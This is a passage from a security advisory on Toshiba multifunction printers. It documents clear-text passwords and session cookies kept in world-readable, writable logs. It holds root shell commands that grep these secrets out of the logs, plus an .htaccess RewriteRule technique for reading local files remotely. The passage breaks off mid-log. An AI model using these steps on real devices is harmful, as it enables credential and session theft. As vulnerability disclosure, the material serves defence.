ls -la /ramdisk/al/network/log/http.log  
-rw-rw-rw- 1 root trusted 663910 May 27 16:20  
/ramdisk/al/network/log/http.log  
bash-4.1# ls -la /ramdisk/work/log/al/boserverEvent.log.28.txt  
ls -la /ramdisk/work/log/al/boserverEvent.log.28.txt  
-rwxrwxrwx 1 root trusted 715841 May 27 16:20  
/ramdisk/work/log/al/boserverEvent.log.28.txt  
bash-4.1#  
  
  
  
### Clear-text password written in logs when a password is modified  
  
Using the TopAccess web interface, it is possible to update passwords of users.  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html]  
  
Such password will be found in the log files (`NEW-PASSWORD-PIERRE`):  
  
bash-4.1# grep -r NEW-PASSWORD-PIERRE .  
./work/log/al/boserverEvent.log.28.txt:<Evt><t>05/27  
16:22:22933938</t><Set><sID>ContentWebServer_10.0.0.2.63e5f73ea1d7ecf9cfd935393adb8b11</sID><pID>4974</pID><pName>httpd</pName><SetValue><Payload  
XMLPayLoad = "true" overrideDelta =  
"true"><path></path><value><UserManager><View><UpdateUser><User  
ID="10002"><Information><passwd>NEW-PASSWORD-PIERRE</passwd><UserSoftKeyboardDisplay>true</UserSoftKeyboardDisplay></Information></User></UpdateUser></View></UserManager></value></Payload></SetValue></Set></Evt>  
bash-4.1#  
  
And this log file also has insecure permissions, allowing any user to  
retrieve the passwords or to modify the log file.  
  
The files can be also modified by a remote attacker using the  
Pre-authenticated Remote Code Execution as root or apache and multiple  
Local Privilege Escalations vulnerability.  
  
bash-4.1# ls -la /ramdisk/work/log/al/boserverEvent.log.28.txt  
ls -la /ramdisk/work/log/al/boserverEvent.log.28.txt  
-rwxrwxrwx 1 root trusted 886685 May 27 16:23  
/ramdisk/work/log/al/boserverEvent.log.28.txt  
bash-4.1#  
  
An attacker can retrieve passwords.  
  
An attacker can modify the logs.  
  
A remote attacker can retrieve the credentials and bypass the  
authentication mechanism by uploading a .htaccess file containing a  
RewriteRule (`RewriteRule /pwned.txt file:/path/to/local/file`), using  
the Pre-authenticated Remote Code Execution as root or apache and  
multiple Local Privilege Escalations vulnerability.  
  
  
  
## Details - Leak of authentication sessions in insecure logs in  
/ramdisk/work/log directory  
  
It was observed that the session cookies, used for authentication, are  
stored in clear-text logs. These logs are world-readable and some can  
also be freely modified by any local attacker.  
  
Some logs are stored inside the `/ramdisk/work/log` directory with  
insecure permissions. We can find the authentication sessions (e.g.  
`ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e`) inside.  
  
Leak of sessions inside the log files:  
  
bash-4.1# pwd  
/work/log  
bash-4.1# grep -r '10.0.0.2\.' *  
[...]  
./log/al/boserverEvent.log.26.txt:<Evt><t>05/30  
15:50:21222835</t><Session  
"timerReset"><id>ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e</id><num>658</num><pID>2670</pID><pName>alappmanager</pName><newTimerValue>0</newTimerValue></Session></Evt>  
./log/al/boserver.log.0.txt:05/30 15:50:05535294 Pid= 1657,Tid=  
1784,cborepository.cpp: 5340:WRN:HANDLECMD_RES: Response of Command  
'GetSettings' from Plugin to 'httpd' in  
SessionID(ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e).  
./log/al/boserver.log.0.txt:05/30 15:50:05552743 Pid= 1657,Tid=  
1783,cborepository.cpp: 4816:WRN:DELIVERCMD: Delegating Command  
'LicenseEnableCheck' from 'httpd' to Plugin 'LicenseMgmt-0x9f' with  
SessionID(ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e).  
./log/al/boserver.log.0.txt:05/30 15:50:05556758 Pid= 1657,Tid=  
1785,cborepository.cpp: 5340:WRN:HANDLECMD_RES: Response of Command  
'LicenseEnableCheck' from Plugin to 'httpd' in  
SessionID(ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e).  
./log/al/boserver.log.0.txt:05/30 15:50:14741108 Pid= 1657,Tid=  
1784,cborepository.cpp: 4816:WRN:DELIVERCMD: Delegating Command  
'LicenseEnableCheck' from 'httpd' to Plugin 'LicenseMgmt-0x9f' with  
SessionID(ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e).  
./log/al/boserver.log.0.txt:05/30 15:50:14745065 Pid= 1657,Tid=  
1783,cborepository.cpp: 5340:WRN:HANDLECMD_RES: Response of Command  
'LicenseEnableCheck' from Plugin to 'httpd' in  
SessionID(ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e).  
./log/al/aldeviceconfig.log.0.txt: * SessionID :  
ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e  
./log/al/aldeviceconfig.log.0.txt: * DeltaDocName :  
hdb:/ramdisk/al/tmp/ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e/DiagnosticModeTransactionDoc_ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e  
[...]  
./log/al/aldeviceconfig.log.0.txt: * DeltaDocName :  
hdb:/ramdisk/al/tmp/ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e/DiagnosticModeTransactionDoc_ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e  
./log/al/sapp/python_settingapp.log:03/16 20:57:34966 Pid= 5653  
Tid= 1820326768 tweens.py 176 WARNING Add session map. key =  
ContentWebServer_10.0.0.2.fc4db19cc6c8eba31abca23ece735dd7 value =  
ContentWebServer_10.0.0.2.fc4db19cc6c8eba31abca23ece735dd7  
./log/al/sapp/python_settingapp.log:03/16 21:08:35016 Pid= 5653  
Tid= 1675623280 tweens.py 347 WARNING Delete session map. key =  
ContentWebServer_10.0.0.2.fc4db19cc6c8eba31abca23ece735dd7 value =  
ContentWebServer_10.0.0.2.fc4db19cc6c8eba31abca23ece735dd7, length1  
./log/al/authplugin.log.0.txt:05/30 15:16:07935854 Pid=  
1872,UserAuthManger.cpp:11476:ERR:delta Doc  
Name::hdb:/ramdisk/al/tmp/ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e/AuthenticationTransactionDoc_ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e  
[...]  
./log/al/renderer.log.1.txt:05/30 20:21:13780508 Pid= 1992,Tid=  
2939,LegacyPanel/src/cpanelmanager.cpp: 2983:WRN:Rcv ST : 72 :  
1c000001 : <?xml version="1.0"  
encoding="UTF-8"?><Notification><Payload  
model="pull"><path>SecurityConfiguration/SecuritySettings/isLoginReqd</path><sessionID>ContentWebServer_10.0.0.2.ab52ced8304357f2b382460bbdd797dc</sessionID><subscriptionID>1275</subscriptionID></Payload></Notification>  
[...]  
/log/al/prm.log.0.txt:05/30 15:18:16563007 Pid= 1885,Tid=  
2163,manager.cpp: 1874:ERR:Delta Document  
hdb:/ramdisk/al/tmp/ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e/PresentationResourcesTransactionDoc_ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e  
could not be opened. Creating it  
  
We can list the files containing such authentication sessions:  
  
- - log/al/aldeviceconfig.log.0.txt  
- - log/al/appmanager.log.0.txt  
- - log/al/appmanagerlibrary.log.0.txt  
- - log/al/authplugin.log.0.txt  
- - log/al/boserver.log.0.txt  
- - log/al/boserverEvent.log.26.txt  
- - log/al/epfx/eprocessframework.log.0.txt  
- - log/al/prm.log.0.txt  
- - log/al/renderer.log.0.txt  
- - log/al/renderer.log.1.txt  
- - log/al/renderer.log.2.txt  
- - log/al/sapp/python_settingapp.log  
- - log/al/webpanel/eapi.log.0.txt  
  
Using the shell:  
  
bash-4.1# grep -r '10.0.0.2\.' * | sed -e 's#:# #' | awk '{ print  
$1 }' | sort | uniq  
log/al/aldeviceconfig.log.0.txt  
log/al/appmanager.log.0.txt  
log/al/appmanagerlibrary.log.0.txt  
log/al/authplugin.log.0.txt  
log/al/boserver.log.0.txt  
log/al/boserverEvent.log.26.txt  
log/al/epfx/eprocessframework.log.0.txt  
log/al/prm.log.0.txt  
log/al/renderer.log.0.txt  
log/al/renderer.log.1.txt  
log/al/renderer.log.2.txt  
log/al/sapp/python_settingapp.log  
log/al/webpanel/eapi.log.0.txt  
log/al/webpanel/python_ta.log  
  
These files have insecure permissions allowing any user to retrieve  
the passwords, and some files can be freely modified by any local  
attacker (or any remote attacker using the Pre-authenticated Remote  
Code Execution as root or apache and multiple Local Privilege  
Escalations vulnerability):  
  
Insecure permissions for log files:  
  
bash-4.1# for i in $(grep -r '10.0.0.2\.' * | sed -e 's#:# #' |  
awk '{ print $1 }' | sort | uniq); do ls -la $i;done  
-rw-r--r-- 1 apache trusted 177116 May 30 15:51  
log/al/aldeviceconfig.log.0.txt  
-rw-r--r-- 1 apache trusted 57508 May 30 15:51 log/al/appmanager.log.0.txt  
-rwxrwxrwx 1 root trusted 285227 May 30 16:15  
log/al/appmanagerlibrary.log.0.txt  
-rw-r--r-- 1 apache trusted 8839 May 30 15:51 log/al/authplugin.log.0.txt  
-rw-r--r-- 1 apache trusted 57082 May 30 15:51 log/al/boserver.log.0.txt  
-rwxr-xr-x 1 apache trusted 850786 May 30 15:51  
log/al/boserverEvent.log.26.txt  
-rwxr-xr-x 1 apache trusted 18608 May 30 15:51  
log/al/epfx/eprocessframework.log.0.txt  
-rw-r--r-- 1 apache trusted 18151 May 30 15:51 log/al/prm.log.0.txt  
-rwxrwxrwx 1 root trusted 1048682 May 30 19:28 log/al/renderer.log.0.txt  
-rwxrwxrwx 1 root trusted 1048606 May 30 21:50 log/al/renderer.log.1.txt  
-rw-r--r-- 1 apache trusted 527501 May 30 15:51 log/al/renderer.log.2.txt  
-rwxrwxrwx 1 apache trusted 1958 May 30 21:08  
log/al/sapp/python_settingapp.log  
-rwxrwxrwx 1 root trusted 669880 May 30 16:15 log/al/webpanel/eapi.log.0.txt  
-rwxrwxrwx 1 apache trusted 311373 May 30 15:53  
log/al/webpanel/python_ta.log  
  
An attacker can retrieve authentication sessions.  
  
A remote attacker can retrieve the credentials and bypass the  
authentication mechanism by uploading a .htaccess file containing a  
RewriteRule (`RewriteRule /pwned.txt file:/path/to/local/file`), using  
the Pre-authenticated Remote Code Execution as root or apache and  
multiple Local Privilege Escalations vulnerability.  
  
  
  
## Details - Leak of authentication sessions in insecure logs in  
/ramdisk/al/network/log directory  
  
It was observed that the sessions are stored in clear-text logs. These  
logs are world-readable and some can also be freely modified by any  
local attacker.  
  
Some logs are stored inside the `/ramdisk/al/network/log` directory  
with insecure permissions. We can find the authentication sessions  
inside:  
  
bash-4.1# pwd  
/ramdisk/al/network/log  
bash-4.1# ls -la  
total 184  
drwxr-xr-x 6 root root 0 May 30 10:38 .  
drwxr-xr-x 7 root root 0 May 30 10:39 ..  
-rw-rw-rw- 1 root trusted 1455 May 30 10:38 dibbler-client.log  
-rw-rw-rw- 1 root trusted 23051 May 30 16:48 hp9100.log.0.txt  
-rw-rw-rw- 1 root trusted 58886 May 30 17:29 http.log  
-rw-rw-rw- 1 root trusted 6143 May 30 17:29 http_access.log  
-rw-rw-rw- 1 root trusted 9194 May 30 14:08 https.log  
-rw-rw-rw- 1 root trusted 962 May 30 15:01 lprng.log.0.txt  
-rw-r----- 1 root adm 8767 May 30 16:38 maillog  
-rw-rw-rw- 1 root trusted 58619 May 30 17:23 nqlog.log  
drwxrwxrwx 2 root trusted 0 May 30 10:38 wsd  
drwxrwxrwx 2 root trusted 0 May 30 10:38 wsm  
drwxrwxrwx 2 root trusted 0 May 30 10:38 wsp  
drwxrwxrwx 2 root trusted 0 May 30 10:38 wsscn  
bash-4.1# grep SessionID *  
http.log:[Thu May 30 17:29:08.209477 2023]  
[contentwebserver:debug] [pid 5113] ccontentwebserver.cpp(1130):  
[client 10.0.0.2:43384] CContentWebServer::  
SessionID=[ContentWebServer_10.0.0.2.874eef7e817c9d053cbdc618d850ab61]  
ignoreSessionTimeout=[IgnoreSessionTimeout], referer:  
http://10.0.0.1:8080/  
http.log:[Thu May 30 17:29:08.739761 2023]  
[contentwebserver:debug] [pid 5118] ccontentwebserver.cpp(1130):  
[client 10.0.0.2:43386] CContentWebServer::  
SessionID=[ContentWebServer_10.0.0.2.874eef7e817c9d053cbdc618d850ab61]  
ignoreSessionTimeout=[IgnoreSessionTimeout], referer:  
http://10.0.0.1:8080/FrameIndex.html?v=1670282309ta  
[...]  
bash-4.1# grep -i cookie *  
http.log:Utility::GetCookie sCookievalue=[]  
http.log:[Thu May 30 12:49:00.729591 2023]  
[contentwebserver:error] [pid 5121] [client 10.0.0.2:50619]  
[utility.cpp : 563] In SetCookie:: NO cookieInfo sent  
http.log:[Thu May 30 12:49:00.729632 2023]  
[contentwebserver:error] [pid 5121] [client 10.0.0.2:50619]  
[utility.cpp : 594] In SetCookie::cookiebuf  
10.0.0.2.289d834d7086d004ce9a710590e10be1  
http.log: Utility::GetCookie cookieName=[Session]  
http.log:Utility::GetCookie sCookievalue=[]  
http.log:[Thu May 30 14:08:17.935840 2023]